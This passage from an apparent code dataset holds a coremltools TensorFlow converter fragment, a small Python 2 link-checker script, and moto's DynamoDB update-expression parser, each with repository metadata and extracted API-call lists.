get_tuple, Identity etc.), and thus the # last Var would have a different name than the last TF op's name. # # Example: # # TF code: # x = tf.placeholder(tf.float32, shape=(1,)) # y = tf.placeholder(tf.float32, shape=(1,)) # c = lambda i, j: \ # tf.less(tf.math.reduce_mean(i), tf.math.reduce_mean(j)) # b = lambda i, j: (tf.add(i, 1), j) # res = tf.while_loop(c, b, [x, y]) # # Resulting nodes (excluding the nodes in while loop cond & body): # # node name: Placeholder op type: Placeholder inputs: [] # node name: Placeholder_1 op type: Placeholder inputs: [] # node name: make_input_0 op type: make_tuple inputs: ['Placeholder', # 'Placeholder_1'] # node name: while_0 op type: while inputs: ['make_input_0'] # node name: while/Exit op type: get_tuple inputs: ['while_0'] # node name: while/Exit_1 op type: get_tuple inputs: ['while_0'] # # Observe that return node `while/Exit` is an output from get_tuple, # which in our translation simply unpack a python tuple of Vars # ('while_0:0', 'while_0:1') returned from while_0 SSA op. We need to # rename `while_0:0` to `while/Exit` in order for users to find the # output. # Note: only rename the output if the output is not Placeholder. input_names = [x.name for x in self.inputs] for v_o, out_name in zip(prog["main"].outputs, self.outputs): if v_o.name != out_name and v_o.name not in input_names: logging.info( "Renaming output var: '{}' -> '{}'".format(v_o.name, out_name) ) v_o.name = out_name self.check_placeholder_output(prog, self.outputs) @_profile def convert(self): prog = Program() if len(self.graph_stack) == 0: raise ValueError("At least one TF function must be present") if self.graph_stack[0] != "main": msg = "TF root graph must be named 'main'. 
Got {}" raise ValueError(msg.format(self.graph_stack[0])) graph = self.tfssa.functions["main"].graph for g_name in self.graph_stack[1:]: self.context.add_graph(g_name, self.tfssa.functions[g_name].graph) self.convert_main_graph(prog, graph) # Apply TF frontend passes on Program. These passes are different # from passes applied to tfssa. self.tensorflow_passes(prog) return prog
[((397, 15, 397, 24), 'coremltools.converters.mil.mil.Program', 'Program', ({}, {}), '()', False, 'from coremltools.converters.mil.mil import Program\n'), ((78, 12, 78, 39), 'logging.info', 'logging.info', ({(78, 25, 78, 38): '(msg % tf_name)'}, {}), '(msg % tf_name)', False, 'import logging\n'), ((327, 43, 328, 76), 'coremltools.converters.mil.mil.Builder.placeholder', 'mb.placeholder', (), '', True, 'from coremltools.converters.mil.mil import Builder as mb\n'), ((331, 13, 331, 34), 'coremltools.converters.mil.mil.Function', 'Function', ({(331, 22, 331, 33): 'func_inputs'}, {}), '(func_inputs)', False, 'from coremltools.converters.mil.mil import Function\n'), ((201, 26, 201, 72), 'coremltools.converters.mil.input_types.TensorType', 'TensorType', (), '', False, 'from coremltools.converters.mil.input_types import InputType, TensorType, ImageType, RangeDim, _get_shaping_class\n'), ((180, 32, 180, 57), 'coremltools.converters.mil.input_types._get_shaping_class', '_get_shaping_class', ({(180, 51, 180, 56): 'shape'}, {}), '(shape)', False, 'from coremltools.converters.mil.input_types import InputType, TensorType, ImageType, RangeDim, _get_shaping_class\n'), ((199, 21, 199, 37), 'coremltools.converters.mil.mil.get_new_symbol', 'get_new_symbol', ({}, {}), '()', False, 'from coremltools.converters.mil.mil import get_new_symbol\n'), ((223, 27, 223, 41), 'coremltools.converters.mil.mil.types.symbolic.is_symbolic', 'is_symbolic', ({(223, 39, 223, 40): 's'}, {}), '(s)', False, 'from coremltools.converters.mil.mil.types.symbolic import is_symbolic\n'), ((320, 33, 320, 72), 'coremltools.converters.mil.mil.Builder.identity', 'mb.identity', (), '', True, 'from coremltools.converters.mil.mil import Builder as mb\n'), ((351, 24, 351, 57), 'coremltools.converters.mil.mil.Builder.identity', 'mb.identity', (), '', True, 'from coremltools.converters.mil.mil import Builder as mb\n'), ((178, 29, 178, 45), 'coremltools.converters.mil.mil.get_new_symbol', 'get_new_symbol', ({}, {}), '()', False, 'from coremltools.converters.mil.mil import get_new_symbol\n')]
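In the converter above, _get_stack records, for every while-loop body/cond function, the graph that calls it, and then orders the graphs so that 'main' is converted first. The ordering helper and the example dependency map below are illustrative stand-ins for that idea; they are not coremltools' own simple_topsort.

def order_graphs(dep):
    # dep[name] lists the graphs that must be processed before `name`;
    # the root graph ('main') is expected to have no dependencies.
    order = []
    pending = dict(dep)
    while pending:
        ready = [name for name, parents in pending.items()
                 if all(p in order for p in parents)]
        if not ready:
            raise ValueError('cyclic graph dependencies')
        for name in sorted(ready):
            order.append(name)
            del pending[name]
    return order

# Hypothetical example: 'main' contains one while loop.
dep = {'main': [], 'while_body': ['main'], 'while_cond': ['main']}
print(order_graphs(dep))  # ['main', 'while_body', 'while_cond']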
clayball/pylinkcheck
pylinkcheck.py
085e5562525bebc77b8ebfd3b0fb676b01f4be68
#!/usr/bin/env python # Copyright (c) 2016 Clay Wells # # A Python-based link checker. # # Usage: pylinkcheck.py -r https://www.example.com # # By default, we can spider and check all of the links found at the URL's # domain. For example, a check of https://foo.example.com will only check # links with the base URL path of foo.example.com. Link found to # bar.example.com will not be checked. # # Fancy run-time options # url root (domain): this is simply required # generate report file: -o output.txt, --output=output.txt # limit depth: -l 2, --limit=2 # TODO: report format: --format=txt,html,xml ############################################################################## import argparse import urllib2 import csv from datetime import datetime import re from urlparse import urlparse from bs4 import BeautifulSoup ####################################### # Functions # Spider the base URL def spiderURL(baseurl, pathlimit): # build a list based on each sub directory found print '[spider] path limit set to %d' % pathlimit # Print an informative summary of the dead links def printReport(deadlinks): # print each item in the deadlinks list or CLEAN if empty print '\n\n' print '#' * 79 print ' Link Checker Results\n' if not deadlinks: print '[+] CLEAN: No dead links found' else: for item in deadlinks: print '[-] NOT FOUND: %s' % item ####################################### # Main program # # Get command line options parser = argparse.ArgumentParser(description='A Python-based link checker.') parser.add_argument('-f','--format', required=False, default='txt', help='Output file format ') parser.add_argument('-l','--limit', required=False, default=2, help='Limit directory depth, example.com/limit/dir/depth/') parser.add_argument('-u','--url', help='Base URL to check', required=True) parser.add_argument('-o','--output', help='Output file name', required=False) args = parser.parse_args() # Assign program arguments to variables # - we may want to add a '/' to baseurl if it's not present. # - if the href links are relative we need to add the baseurl when checking # the link. baseurl = str(args.url) pathlimit = int(args.limit) # Show values print 'Base URL: %s' % args.url print 'Output file format: %s' % args.format print 'Output file: %s' % args.output print 'Limit spider: %d' % args.limit # Grab today's date for timestamping output file. now = datetime.now() tstamp = now.strftime("%Y%m%d-%H%M") # Grab all a href links checkurl = urllib2.urlopen(baseurl).read() soup = BeautifulSoup(checkurl, 'html.parser') # Spider the site and build our list of URLs to check spiderURL(baseurl, pathlimit) deadlinks = [] # This for loop will completely change once the spiderURL function is working. # We'll iterate over the various directory paths instead. outofscope = 0 # Check the URLs for link in soup("a"): # Fetch the link but only return the status code # hrefs are unpredicatable we can add a function to 'clean' them up, i.e., # get the proto, domain, path, file (TODO: for a complete solution we # need to get all of this) #if baseurl[:-1] == '/': # print '[debug] strip last char from baseurl' # mailto: is causing an error href = link.get('href') print '[debug] href: %s' % href if re.match('^mailto', href): # skip this one continue # Separate the file from the path thisurl = urlparse(href) if thisurl.netloc != baseurl and thisurl.netloc != '': print '[-] HREF %s is out of scope' % thisurl.netloc outofscope = 1 else: print '[debug] path %s' % thisurl.path outofscope = 0 # Build the full URL if the href is relative. 
# - assuming, for now, other protocols are not desired # - place this in the Spider function try: if re.match('^http', href): checkurl = href else: checkurl = baseurl + href except: print '[-] Unknown error in re.match()' try: #print '[+] checking %s' % checkurl hrefpage = urllib2.urlopen(checkurl) except urllib2.HTTPError as e: if e.code == 404: print '[-] 404 ERROR: %s' % checkurl # add this URL to deadlink list deadlinks.append(checkurl) else: print '[-] HTTP ERROR: %d - %s' % (e.code, checkurl) except urllib2.URLError as e: # Not an HTTP-specific error (e.g. connection refused), so there is no e.code; report e.reason instead print '[-] NON-HTTP ERROR: %s - %s' % (e.reason, checkurl) else: print '[+] Status %d for %s' % (hrefpage.getcode(), checkurl) printReport(deadlinks) # EOF
[]
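The link-checking loop in pylinkcheck.py above fetches each href and records 404 responses. Below is a compact sketch of that idea ported to Python 3's urllib.request (the script itself targets Python 2's urllib2), with example.com as a placeholder URL:

import urllib.error
import urllib.request

def check_links(urls):
    # Fetch each URL and collect the ones that return 404.
    deadlinks = []
    for url in urls:
        try:
            with urllib.request.urlopen(url) as page:
                print('[+] Status %d for %s' % (page.getcode(), url))
        except urllib.error.HTTPError as e:
            if e.code == 404:
                deadlinks.append(url)
            print('[-] HTTP ERROR: %d - %s' % (e.code, url))
        except urllib.error.URLError as e:
            # Not an HTTP-specific error (e.g. connection refused); URLError exposes .reason, not .code
            print('[-] NON-HTTP ERROR: %s - %s' % (e.reason, url))
    return deadlinks

if __name__ == '__main__':
    print(check_links(['https://www.example.com/']))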
orenmazor/moto
moto/dynamodb2/parsing/expressions.py
4778377e8ecaf729d26602a2c5202b72c1438503
import logging from abc import abstractmethod import abc import six from collections import deque from moto.dynamodb2.parsing.ast_nodes import ( UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause, ) from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression from moto.dynamodb2.parsing.tokens import Token, ExpressionTokenizer class NestableExpressionParserMixin(object): """ For nodes that can be nested in themselves (recursive). Take for example UpdateExpression's grammar: UpdateExpression => UpdateExpressionClause* UpdateExpression => UpdateExpressionClause* UpdateExpression If we consider it of structure NestableExpression => TargetClause* NestableExpression => TargetClause* NestableExpression This pattern comes back multiple times. This Mixin adds re-usability for that type of pattern. This approach is taken since it allows to remain the ordering of the Nodes as how the corresponding tokens where in the originating expression. """ def __init__(self, *args, **kwargs): self.target_clauses = deque() def _parse_target_clause(self, factory_class): """ Args: factory_class: The factory for the target clause e.g. UpdateExpressionSetClauseParser Returns: """ logging.debug( "Move token pos {pos} to continue parsing with specific factory class {fc}".format( pos=self.token_pos, fc=factory_class.__class__.__name__ ) ) # noinspection PyProtectedMember ast, token_pos = factory_class(**self._initializer_args())._parse_with_pos() self.target_clauses.append(ast) logging.debug( "Continue where previous parsing ended {token_pos}".format( token_pos=token_pos ) ) self.token_pos = token_pos @abstractmethod def _initializer_args(self): """ Get the arguments of the initializer. This is implemented by the calling class. See ExpressionParser for an example. Returns: dict: A dictionary of the initializer arguments """ @classmethod @abstractmethod def _nestable_class(cls): """ Get the class of the Node that will be created that would be nested. For the example in the docstring this would be UpdateExpression Returns: class: The class of the Nodes that will be created. """ def _create_node(self): """ target_clauses has the nodes in order of encountering. Go through them backwards and build the tree bottom up. This way left-deep-descending traversal will process nodes in order. Continuing the example of an UpdateExpression: For example SET a=3 REMOVE b UpdateExpression / \ SET a=3 UpdateExpression | REMOVE b self.target_clauses looks like: ( SET a=3 >> REMOVE b ) Returns: moto.dynamodb2.ast_nodes.Node: Node of an AST representing the Expression as produced by the factory. 
""" assert len(self.target_clauses) > 0, "No nodes for {cn}".format( cn=self.__class__.__name__ ) target_node = self._nestable_class()(children=[self.target_clauses.pop()]) while len(self.target_clauses) > 0: target_node = self._nestable_class()( children=[self.target_clauses.pop(), target_node] ) return target_node @six.add_metaclass(abc.ABCMeta) class ExpressionParser: """Abstract class""" def __init__(self, expression_token_list, token_pos=0): """ Args: expression_token_list: token_pos(int): Location where parsing is """ self.token_list = expression_token_list self.token_pos = token_pos def _initializer_args(self): return {"expression_token_list": self.token_list, "token_pos": self.token_pos} @abstractmethod def _parse(self): """ Start parsing the token_list from token_pos for the factory type. Returns: moto.dynamodb2.ast_nodes.Node: AST which is root node of resulting abstract syntax tree """ @classmethod def is_possible_start(cls, token): return token is not None and cls._is_possible_start(token) @classmethod @abstractmethod def _is_possible_start(cls, token): """ Args: token(moto.dynamodb2.tokens.Token): Returns: bool: True if token is a possible start for entries processed by `cls` """ def _parse_with_pos(self): """ Start parsing the token_list from token_pos for the factory type and also return the resulting token_pos. Returns: (ast, token_pos): tuple of AST which is root node of resulting abstract syntax tree and token_pos is the position in the tokenlist. """ return self._parse(), self.token_pos def parse(self): return self._parse() def get_next_token_type(self): """ Get the type of the next token to be processed Returns: str: Token type or None if no more next token """ try: return self.get_next_token().type except AttributeError: return None def get_next_token(self): """ Get the next token to be processed Returns: moto.dynamodb2.tokens.Token: or None if no more next token """ try: return self.token_list[self.token_pos] except IndexError: return None def get_next_token_value(self): """ Get the value of the next token to be processed Returns: str: value or None if no more next token """ try: return self.get_next_token().value except AttributeError: return None def is_at_end(self): """Return boolean indicating whether we are at end of the parsing""" return self.token_pos == len(self.token_list) def is_at_start(self): """Return boolean indicating whether we are at start of the parsing""" return self.token_pos == 0 def get_last_token_value(self): """Get the last token that was correctly parsed or return empty string""" if self.token_pos > 0: return self.token_list[self.token_pos - 1].value else: return "" def get_last_token_type(self): """Get the last token type that was correctly parsed or return None""" if self.token_pos > 0: return self.token_list[self.token_pos - 1].type else: return None def get_2nd_last_token_value_if_last_was_whitespace(self): """Get the 2nd last token that was correctly parsed if last one was whitespace or return empty string""" if self.token_pos > 1 and self.get_last_token_type() == Token.WHITESPACE: return self.token_list[self.token_pos - 2].value else: return "" def get_following_token_value(self): """Get the token value after the one that is being parsed or empty string if non existent.""" try: return self.token_list[self.token_pos + 1].value except IndexError: return "" def get_following_token_type(self): """Get the token type after the one that is being parsed or None if non existent.""" try: return self.token_list[self.token_pos + 1].type except 
IndexError: return None def get_2nd_following_token_value_if_following_was_whitespace(self): """Get the 2nd following token that was correctly parsed if 1st one was whitespace or return empty string""" if self.get_following_token_type() == Token.WHITESPACE: try: return self.token_list[self.token_pos + 2].value except IndexError: return "" else: return "" def skip_white_space(self): try: while self.get_next_token_type() == Token.WHITESPACE: self.token_pos += 1 except IndexError: assert self.token_pos > 0, "We should always have positive indexes" logging.debug("We are out of range so end is reached") def process_token_of_type(self, token_type): """ Maker sure the next token is of type `token_type` if not raise unexpected token Args: token_type: A token type Returns: str: The value if the token is of type `token_type` """ if self.get_next_token_type() == token_type: token_value = self.get_next_token_value() self.goto_next_significant_token() return token_value else: self.raise_unexpected_token() def goto_next_significant_token(self): """Continue past current token and skip all whitespaces""" self.token_pos += 1 self.skip_white_space() def raise_unexpected_token(self): if self.is_at_end(): problematic_token = "<EOF>" problematic_token_in_near = "" else: problematic_token_in_near = problematic_token = self.get_next_token_value() near = "".join( [ self.get_2nd_last_token_value_if_last_was_whitespace(), self.get_last_token_value(), problematic_token_in_near, self.get_following_token_value(), self.get_2nd_following_token_value_if_following_was_whitespace(), ] ) raise InvalidTokenException(problematic_token, near) class NestableBinExpressionParser(ExpressionParser): """ For nodes that can be nested in themselves (recursive) but with an operation. Take for example UpdateExpressionValue's grammar: Value => Operand* Value => Operand* + Value Value => Operand* - Value If we consider it of structure NestableBinExpression => TargetClause* NestableBinExpression => TargetClause* BinOp NestableBinExpression This pattern comes back multiple times. This Mixin adds re-usability for that type of pattern. This approach is taken since it allows to remain the ordering of the Nodes as how the corresponding tokens where in the originating expression. """ def __init__(self, *args, **kwargs): super(NestableBinExpressionParser, self).__init__(*args, **kwargs) self.target_nodes = deque() def _parse_target_clause(self, factory_class): """ Args: factory_class: The factory for the target clause e.g. UpdateExpressionSetClauseParser Returns: """ # noinspection PyProtectedMember ast, self.token_pos = factory_class( **self._initializer_args() )._parse_with_pos() self.target_nodes.append(ast) logging.debug( "Continue where previous parsing ended {token_pos}".format( token_pos=self.token_pos ) ) def _parse(self): self._parse_target_clause(self._operand_factory_class()) while self._binop_factory_class().is_possible_start(self.get_next_token()): self._parse_target_clause(self._binop_factory_class()) if self._operand_factory_class().is_possible_start(self.get_next_token()): self._parse_target_clause(self._operand_factory_class()) else: self.raise_unexpected_token() return self._create_node() @abstractmethod def _operand_factory_class(self): """ Get the Parser class of the Operands for the Binary operations/actions. Returns: class: """ @abstractmethod def _binop_factory_class(self): """ Get a factory that gets the possible binary operation. 
Returns: class: A class extending ExpressionParser """ def _create_node(self): """ target_clauses has the nodes in order of encountering. Go through them forward and build the tree bottom up. For simplicity docstring will use Operand Node rather than the specific node This way left-deep-descending traversal will process nodes in order. Continuing the example of an UpdateExpressionValue: For example value => a + :val - :val2 UpdateExpressionValue / | \ UpdateExpressionValue BinOp Operand / | | | | UpdateExpressionValue BinOp Operand - :val2 / | | Operand + :val | a self.target_nodes looks like: ( a >> + >> :val >> - >> :val2 ) Returns: moto.dynamodb2.ast_nodes.Node: Node of an AST representing the Expression as produced by the factory. """ if len(self.target_nodes) == 1: return UpdateExpressionValue(children=[self.target_nodes.popleft()]) else: target_node = UpdateExpressionValue( children=[ self.target_nodes.popleft(), self.target_nodes.popleft(), self.target_nodes.popleft(), ] ) while len(self.target_nodes) >= 2: target_node = UpdateExpressionValue( children=[ target_node, self.target_nodes.popleft(), self.target_nodes.popleft(), ] ) assert len(self.target_nodes) == 0 return target_node class UpdateExpressionParser(ExpressionParser, NestableExpressionParserMixin): """ Parser to create update expressions """ @classmethod def _sub_factories(cls): return [ UpdateExpressionSetClauseParser, UpdateExpressionAddClauseParser, UpdateExpressionDeleteClauseParser, UpdateExpressionRemoveClauseParser, ] @classmethod def _is_possible_start(cls, token): pass def __init__(self, *args, **kwargs): super(UpdateExpressionParser, self).__init__(*args, **kwargs) NestableExpressionParserMixin.__init__(self) @classmethod def _nestable_class(cls): return UpdateExpression def _parse_expression_clause(self, factory_class): return self._parse_target_clause(factory_class) def _parse_by_a_subfactory(self): for sub_factory in self._sub_factories(): if sub_factory.is_possible_start(self.get_next_token()): self._parse_expression_clause(sub_factory) return True return False def _parse(self): """ Update Expression is the top-most node therefore it is expected to end up at the end of the expression. 
""" while True: self.skip_white_space() if self.is_at_end(): logging.debug("End reached") break elif self._parse_by_a_subfactory(): continue else: self.raise_unexpected_token() return self._create_node() @classmethod def make(cls, expression_str): token_list = ExpressionTokenizer.make_list(expression_str) return cls(token_list).parse() class UpdateExpressionSetClauseParser(ExpressionParser): """ UpdateExpressionSetClause => SET SetActions """ @classmethod def _is_possible_start(cls, token): return token.type == Token.ATTRIBUTE and token.value.upper() == "SET" def _parse(self): assert self.is_possible_start(self.get_next_token()) self.goto_next_significant_token() ast, self.token_pos = UpdateExpressionSetActionsParser( **self._initializer_args() )._parse_with_pos() # noinspection PyProtectedMember return UpdateExpressionSetClause(children=[ast]) class UpdateExpressionActionsParser(ExpressionParser, NestableExpressionParserMixin): """ UpdateExpressionSetActions """ def __init__(self, *args, **kwargs): super(UpdateExpressionActionsParser, self).__init__(*args, **kwargs) NestableExpressionParserMixin.__init__(self) @classmethod def _is_possible_start(cls, token): raise RuntimeError( "{class_name} cannot be identified by the next token.".format( class_name=cls._nestable_class().__name__ ) ) @classmethod @abstractmethod def _nestable_class(cls): return UpdateExpressionSetActions @classmethod @abstractmethod def _nested_expression_parser_class(cls): """Returns the parser for the query part that creates the nested nodes""" def _parse(self): """ UpdateExpressionSetActions is inside the expression so it can be followed by others. Process SetActions one by one until no more SetAction. """ self.skip_white_space() while self._nested_expression_parser_class().is_possible_start( self.get_next_token() ): self._parse_target_clause(self._nested_expression_parser_class()) self.skip_white_space() if self.get_next_token_type() == Token.COMMA: self.goto_next_significant_token() else: break if len(self.target_clauses) == 0: logging.debug( "Didn't encounter a single {nc} in {nepc}.".format( nc=self._nestable_class().__name__, nepc=self._nested_expression_parser_class().__name__, ) ) self.raise_unexpected_token() return self._create_node() class UpdateExpressionSetActionsParser(UpdateExpressionActionsParser): """ UpdateExpressionSetActions """ @classmethod def _nested_expression_parser_class(cls): return UpdateExpressionSetActionParser @classmethod def _nestable_class(cls): return UpdateExpressionSetActions class UpdateExpressionSetActionParser(ExpressionParser): """ SetAction => Path = Value So we create an UpdateExpressionSetAction Node that has 2 children. Left child Path and right child Value. """ @classmethod def _is_possible_start(cls, token): return UpdateExpressionPathParser.is_possible_start(token) def _parse(self): """ UpdateExpressionSetActionParser only gets called when expecting a SetAction. So we should be aggressive on raising invalid Tokens. 
We can thus do the following: 1) Process path 2) skip whitespace if there are any 3) Process equal-sign token 4) skip whitespace if there are any 3) Process value """ path, self.token_pos = UpdateExpressionPathParser( **self._initializer_args() )._parse_with_pos() self.skip_white_space() self.process_token_of_type(Token.EQUAL_SIGN) self.skip_white_space() value, self.token_pos = UpdateExpressionValueParser( **self._initializer_args() )._parse_with_pos() return UpdateExpressionSetAction(children=[path, value]) class UpdateExpressionPathParser(ExpressionParser): """ Paths are selectors within items to specify a part within an Item. DynamoDB does not impose much restrictions on the data it stores but it does store more strict restrictions on how they are represented in UpdateExpression's. """ def __init__(self, *args, **kwargs): super(UpdateExpressionPathParser, self).__init__(*args, **kwargs) self.path_nodes = [] @classmethod def _is_possible_start(cls, token): """ Args: token(Token): the token to be checked Returns: bool: Whether the token could be the start of an UpdateExpressionPath """ if token.type == Token.ATTRIBUTE_NAME: return True elif token.type == Token.ATTRIBUTE and token.value.upper() != "REMOVE": """We have to make sure remove is not passed""" return True return False def _parse(self): return self.process_path() def process_path(self): self.parse_path() return UpdateExpressionPath(children=self.path_nodes) def parse_path(self): """ A path is comprised of: - Attribute: the name of an attribute as how it is stored which has no special characters - ATTRIBUTE_NAME: A placeholder that has no special characters except leading # to refer to attributes that have a name that is not allowed in an UpdateExpression) - DOT's: These are used to decent in a nested structure. When a DOT is in a path expression it is never part of an attribute name but always means to descent into a MAP. We will call each descend a patch chain - SELECTORs: E.g.: [1] These are used to select an element in ordered datatypes like a list. Whitespaces can be between all these elements that build a path. For SELECTORs it is also allowed to have whitespaces between brackets and numbers but the number cannot be split up with spaces Attributes and attribute_names must be separated with DOT's. Returns: UpdateExpressionPath: """ self.parse_path_chain() while self.is_next_token_start_of_patch_chain(): self.process_dot() self.parse_path_chain() def is_next_token_start_of_patch_chain(self): return self.get_next_token_type() == Token.DOT def process_dot(self): self.path_nodes.append(ExpressionPathDescender()) self.goto_next_significant_token() def parse_path_chain(self): self.process_attribute_identifying_token() self.skip_white_space() while self.is_next_token_start_of_selector(): self.process_selector() self.skip_white_space() def process_attribute_identifying_token(self): if self.get_next_token_type() == Token.ATTRIBUTE: self.path_nodes.append(ExpressionAttribute(self.get_next_token_value())) elif self.get_next_token_type() == Token.ATTRIBUTE_NAME: self.path_nodes.append(ExpressionAttributeName(self.get_next_token_value())) else: self.raise_unexpected_token() self.goto_next_significant_token() def is_next_token_start_of_selector(self): return self.get_next_token_type() == Token.OPEN_SQUARE_BRACKET def process_selector(self): """ Process the selector is only called when a selector must be processed. 
So do the following actions: - skip opening bracket - skip optional spaces - read numeric literal - skip optional spaces - pass closing bracket """ self.process_token_of_type(Token.OPEN_SQUARE_BRACKET) selector_value = self.process_token_of_type(Token.NUMBER) self.process_token_of_type(Token.CLOSE_SQUARE_BRACKET) self.path_nodes.append(ExpressionSelector(selector_value)) class UpdateExpressionValueParser(NestableBinExpressionParser): @classmethod def _is_possible_start(cls, token): return UpdateExpressionOperandParser.is_possible_start(token) def _operand_factory_class(self): return UpdateExpressionOperandParser def _binop_factory_class(self): return UpdateExpressionValueOperatorParser class UpdateExpressionGroupedValueParser(ExpressionParser): """ A grouped value is an Update Expression value clause that is surrounded by round brackets. Each Operand can be a grouped value by itself. """ def _parse(self): self.process_token_of_type(Token.OPEN_ROUND_BRACKET) value, self.token_pos = UpdateExpressionValueParser( **self._initializer_args() )._parse_with_pos() self.process_token_of_type(Token.CLOSE_ROUND_BRACKET) return UpdateExpressionGroupedValue(children=value) @classmethod def _is_possible_start(cls, token): return token.type == Token.OPEN_ROUND_BRACKET class UpdateExpressionValueOperatorParser(ExpressionParser): OPERATION_TOKENS = [Token.PLUS_SIGN, Token.MINUS_SIGN] @classmethod def _is_possible_start(cls, token): return token.type in cls.OPERATION_TOKENS def _parse(self): operation_value = self.get_next_token_value() assert operation_value in self.OPERATION_TOKENS self.goto_next_significant_token() return ExpressionValueOperator(operation_value) class UpdateExpressionOperandParser(ExpressionParser): """ Grammar Operand* => AttributeValue Operand* => UpdateExpressionFunction Operand* => Path Operand* => GroupedValue """ @classmethod def _sub_factories(cls): return [ UpdateExpressionAttributeValueParser, UpdateExpressionFunctionParser, UpdateExpressionPathParser, UpdateExpressionGroupedValueParser, ] @classmethod def _is_possible_start(cls, token): return any(parser.is_possible_start(token) for parser in cls._sub_factories()) def _parse(self): for factory in self._sub_factories(): if factory.is_possible_start(self.get_next_token()): node, self.token_pos = factory( **self._initializer_args() )._parse_with_pos() return node self.raise_unexpected_token() class UpdateExpressionAttributeValueParser(ExpressionParser): def _parse(self): attr_value = ExpressionAttributeValue( self.process_token_of_type(Token.ATTRIBUTE_VALUE) ) return attr_value @classmethod def _is_possible_start(cls, token): return token.type == Token.ATTRIBUTE_VALUE class UpdateExpressionAttributeValueOrPathParser(ExpressionParser): def _parse(self): if UpdateExpressionAttributeValueParser.is_possible_start( self.get_next_token() ): token, self.token_pos = UpdateExpressionAttributeValueParser( **self._initializer_args() )._parse_with_pos() else: token, self.token_pos = UpdateExpressionPathParser( **self._initializer_args() )._parse_with_pos() return token @classmethod def _is_possible_start(cls, token): return any( [ UpdateExpressionAttributeValueParser.is_possible_start(token), UpdateExpressionPathParser.is_possible_start(token), ] ) class UpdateExpressionFunctionParser(ExpressionParser): """ A helper to process a function of an Update Expression """ # Map function to the factories for its elements FUNCTIONS = { "if_not_exists": [ UpdateExpressionPathParser, UpdateExpressionAttributeValueOrPathParser, ], "list_append": 
[UpdateExpressionOperandParser, UpdateExpressionOperandParser], } @classmethod def _is_possible_start(cls, token): """ Check whether a token is supposed to be a function Args: token(Token): the token to check Returns: bool: True if token is the start of a function. """ if token.type == Token.ATTRIBUTE: return token.value in cls.FUNCTIONS.keys() else: return False def _parse(self): function_name = self.get_next_token_value() if function_name not in self.FUNCTIONS.keys(): # Function names are case sensitive raise InvalidUpdateExpression(function_name) self.goto_next_significant_token() self.process_token_of_type(Token.OPEN_ROUND_BRACKET) function_elements = [function_name] function_arguments = self.FUNCTIONS[function_name] for i, func_elem_factory in enumerate(function_arguments): func_elem, self.token_pos = func_elem_factory( **self._initializer_args() )._parse_with_pos() function_elements.append(func_elem) if i + 1 < len(function_arguments): self.skip_white_space() self.process_token_of_type(Token.COMMA) self.process_token_of_type(Token.CLOSE_ROUND_BRACKET) return UpdateExpressionFunction(children=function_elements) class UpdateExpressionRemoveClauseParser(ExpressionParser): """ UpdateExpressionRemoveClause => REMOVE RemoveActions """ def _parse(self): assert self.is_possible_start(self.get_next_token()) self.goto_next_significant_token() ast, self.token_pos = UpdateExpressionRemoveActionsParser( **self._initializer_args() )._parse_with_pos() # noinspection PyProtectedMember return UpdateExpressionRemoveClause(children=[ast]) @classmethod def _is_possible_start(cls, token): """REMOVE is not a keyword""" return token.type == Token.ATTRIBUTE and token.value.upper() == "REMOVE" class UpdateExpressionRemoveActionsParser(UpdateExpressionActionsParser): """ UpdateExpressionSetActions """ @classmethod def _nested_expression_parser_class(cls): return UpdateExpressionRemoveActionParser @classmethod def _nestable_class(cls): return UpdateExpressionRemoveActions class UpdateExpressionRemoveActionParser(ExpressionParser): """ RemoveAction => Path = Value So we create an UpdateExpressionSetAction Node that has 2 children. Left child Path and right child Value. """ @classmethod def _is_possible_start(cls, token): return UpdateExpressionPathParser.is_possible_start(token) def _parse(self): """ UpdateExpressionRemoveActionParser only gets called when expecting a RemoveAction. So we should be aggressive on raising invalid Tokens. 
We can thus do the following: 1) Process path 2) skip whitespace if there are any """ path, self.token_pos = UpdateExpressionPathParser( **self._initializer_args() )._parse_with_pos() self.skip_white_space() return UpdateExpressionRemoveAction(children=[path]) class UpdateExpressionAddClauseParser(ExpressionParser): def _parse(self): assert self.is_possible_start(self.get_next_token()) self.goto_next_significant_token() ast, self.token_pos = UpdateExpressionAddActionsParser( **self._initializer_args() )._parse_with_pos() # noinspection PyProtectedMember return UpdateExpressionAddClause(children=[ast]) @classmethod def _is_possible_start(cls, token): return token.type == Token.ATTRIBUTE and token.value.upper() == "ADD" class UpdateExpressionAddActionsParser(UpdateExpressionActionsParser): """ UpdateExpressionSetActions """ @classmethod def _nested_expression_parser_class(cls): return UpdateExpressionAddActionParser @classmethod def _nestable_class(cls): return UpdateExpressionAddActions @six.add_metaclass(abc.ABCMeta) class UpdateExpressionPathValueParser(ExpressionParser): def _parse_path_and_value(self): """ UpdateExpressionAddActionParser only gets called when expecting an AddAction. So we should be aggressive on raising invalid Tokens. We can thus do the following: 1) Process path 2) skip whitespace if there are any 3) Process a value 4) skip whitespace if there are any Returns: [path, value]: A list containing the Path node and the AttributeValue nodes """ path, self.token_pos = UpdateExpressionPathParser( **self._initializer_args() )._parse_with_pos() self.skip_white_space() value, self.token_pos = UpdateExpressionAttributeValueParser( **self._initializer_args() )._parse_with_pos() self.skip_white_space() return [path, value] class UpdateExpressionAddActionParser(UpdateExpressionPathValueParser): @classmethod def _is_possible_start(cls, token): return UpdateExpressionPathParser.is_possible_start(token) def _parse(self): return UpdateExpressionAddAction(children=self._parse_path_and_value()) class UpdateExpressionDeleteClauseParser(ExpressionParser): def _parse(self): assert self.is_possible_start(self.get_next_token()) self.goto_next_significant_token() ast, self.token_pos = UpdateExpressionDeleteActionsParser( **self._initializer_args() )._parse_with_pos() # noinspection PyProtectedMember return UpdateExpressionDeleteClause(children=[ast]) @classmethod def _is_possible_start(cls, token): return token.type == Token.ATTRIBUTE and token.value.upper() == "DELETE" class UpdateExpressionDeleteActionsParser(UpdateExpressionActionsParser): """ UpdateExpressionSetActions """ @classmethod def _nested_expression_parser_class(cls): return UpdateExpressionDeleteActionParser @classmethod def _nestable_class(cls): return 